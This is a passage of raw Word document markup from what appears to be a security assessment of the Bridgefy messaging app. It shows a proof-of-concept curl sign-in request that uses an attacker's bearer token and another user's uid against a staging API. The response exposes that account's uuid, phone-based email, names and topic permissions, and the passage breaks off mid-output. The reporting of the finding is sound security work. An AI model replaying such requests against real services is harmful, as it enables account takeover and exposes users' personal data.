                      <wps:cNvPr id="21" name="Graphic 21"/>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7.729686pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15723520;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape13" coordorigin="1440,155" coordsize="2880,0" path="m1440,155l4320,155e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="105"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId39">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://portswigger.net/burp</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="21"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId40">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://owasp.org/www-project-</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-4"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>zap/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId41">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://www.telerik.com/fiddler</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="13"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Commands</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(login):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>export </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ATTACKER_TOKEN=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>eyJhbGciOiJSUzI1NiIsImtp[...]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -i -s -k -H </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'Accept: application/json' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-H </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"Authorization: Bearer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>$ATTACKER_TOKEN"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-H </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'Content-Type: application/json; charset=UTF-8'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>--data </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'{"versionOs" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"13.5","platform":"iOS","location":"PE","pushToken":"d4q06lbiiEbXt8pl14c-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>oK:APA91bHVnXr SugH7NMsBwRGZZYRi4pXCmxYaL6GnxjJhZZx7rXyiZjPApjoN-V4w3n_-W0c-yJYkk6VPv8PdYP2J3xlmzFc0uC OonWJNBM8Y9zC2hDl7i6Jif6JgZOaeOjtbzWt7FH2A","versionSdk":"1",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"uid":"bWn0pw2t35UPOPO71Gc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>PuhrqiMy1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,"versionApp":"1.0.0"}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'https://staging.app.bridgefy.services/app/v1/user/signin'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"response"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"uuid"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"e16ee31e-9aea-44c2-abdb-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>57d1f3473b01"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"email"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"+12012987481@bridge fy.app"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"displayName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"oscaraa"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"alias"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"oscarand"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"avatar"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"platform"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"IOS"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"subsc ribe"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"bf/general"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"bf/+/e16ee31e-9aea-44c2-abdb-57d1f3473b01/#"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"bf/e16ee31e-9aea-44c 2-abdb-57d1f3473b01/prekeys"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"bf/clients/+/status"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"publish"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"bf/e16ee31e-9aea-44c2-a bdb-57d1f3473b01/+/#"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"bf/clients/e16ee31e-9aea-44c2-abdb-57d1f3473b01/status"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"versio nApp"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"1.0.0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"versionSdk"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"versionOs"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"13.5"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"phoneVerified"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"identityVerifie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>d"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"blocked"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>},</w:t>
